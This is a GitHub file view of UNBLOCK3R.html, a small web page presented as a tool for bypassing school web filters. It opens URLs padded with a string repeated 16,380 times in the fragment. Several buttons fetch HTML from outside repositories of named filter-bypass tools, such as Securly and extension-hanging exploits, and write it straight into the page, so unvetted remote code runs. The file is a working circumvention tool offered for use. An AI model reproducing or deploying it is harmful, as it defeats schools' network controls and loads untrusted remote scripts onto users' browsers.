-
Notifications
You must be signed in to change notification settings - Fork 0
/
UNBLOCK3R.html
79 lines (79 loc) · 2.76 KB
/
UNBLOCK3R.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
<!DOCTYPE html>
<html>
<head>
<title>UNBLOCK3R</title>
<link rel="icon" href="https://cdn4.iconfinder.com/data/icons/vectory-personnel-2/40/user_unblock-512.png" type="image/png">
<style>
h1 {
font-family: 'Helvetica', sans-serif;
}
p {
font-family: 'Courier', Courier, monospace;
}
button {
border-radius: 5px 15px 5px 15px;
height: 30px;
}
button::hover {
border-radius: 15px 5px 15px 5px;
height: 30px;
}
input {
border-radius: 5px;
height: 30px;
width: 500px;
}
</style>
</head>
<body>
<h1>UNBLOCK3R</h1>
<p>Made by schoolexploitkid <br>Unblocks websites by making urls too long and overloading servers.</p>
<input id='url' placeholder='Search Google or Type a URL'>
<button onclick='openurl()'>Open URL</button>
<br>
<br>
<p>If this does not work for you, try one of the options below.</p>
<button onclick = "launchis()">INSECURLY (For Securly, Made By Bypassi)</button>
<br>
<br>
<button onclick = "launchdns()">CauDNS (All Blockers, Made By dragon731012)</button>
<br>
<br>
<button onclick = "launchde()">Dextensify (All Blockers, Made By ading2210)</button>
<br>
<br>
<button onclick = "launchhang()">ExtHang3r (All Blockers, Made By Blobby-Boi)</button>
<script>
function openurl(){
var url = document.getElementById('url').value;
var string = 'knm43k2643643kj643k3lkj4621642lkj326lkn632632632lk632lk11632lkj6326326326621ckjl2xkj32c';
var urltoopen = "";
if (url.startsWith('https://') || url.startsWith('http://')) {
window.open(urltoopen + url + "#" + string.repeat(16380));
} else {
window.open(urltoopen + "https://google.com/search?q=" + url + "#" + string.repeat(16380));
}
}
function launchis(){
fetch("https://raw.githubusercontent.com/zek-c/Securly-Kill-V111/refs/heads/main/bypassi.html")
.then((response) => response.text())
.then((text) => document.write(text));
}
function launchdns(){
fetch("https://raw.githubusercontent.com/zek-c/Securly-Kill-V111/refs/heads/main/cauDNS.html")
.then((response) => response.text())
.then((text) => document.write(text));
}
function launchde(){
fetch("https://raw.githubusercontent.com/ading2210/dextensify/refs/heads/master/main.html")
.then((response) => response.text())
.then((text) => document.write(text));
}
function launchhang(){
fetch("https://raw.githubusercontent.com/Blobby-Boi/ExtHang3r/refs/heads/main/index.html")
.then((response) => response.text())
.then((text) => document.write(text));
}
</script>
</body>
</html>